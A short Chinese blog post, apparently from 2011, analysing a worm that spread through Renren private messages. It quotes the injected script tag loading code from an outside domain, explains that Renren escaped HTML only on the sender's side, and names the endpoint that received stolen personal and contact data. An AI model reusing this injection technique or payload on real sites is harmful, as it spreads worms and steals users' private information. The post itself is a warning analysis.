4月29日晚,大量人人网用户收到一个标题为《有人暗恋你哦,你想知道TA是谁么》的站内信,用户发现若打开此站内信将会自动将此站内信内容发给所有好友。
通过查看站内信网页源码,发现其中有一行代码为<script src=’http://qiutuan.net/2011/51.js>。显然,一个稍微有点网站编程常识的人都知道“<>”一类标签符号在显示的时候需要转义为普通文本防止浏览器执行,但人人网的转化方式为在用户发送端转化,若绕过此机制直接发送(如此js脚本中直接post站内信内容)则文本中包含的HTML均可被正常执行……
显然作者的意图并非只是恶作剧,通过查看连混淆都懒得做的代码,我们可以很清楚的看到其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,并且通过一个伟大的功能——通讯录,还可以得到所有好友名片中的上述信息……全部信息会发送到http://qiutuan.net/2011/log.php
由于此站内信的传播之广泛,目前只知道此域名几乎是针对性的使用并且托管在美国(因此不能上国外网站的阉割教育网用户也许幸免?),唯一能稍微解决此问题的方法是所有会写代码的人都写一个脚本随机生成数据去稀释被上传的数据,当然要在其收手前做完。
要知道,人人网的隐私保护做的一直没有山寨它的某网站好。
珍爱生命,远离淫淫。
发表回复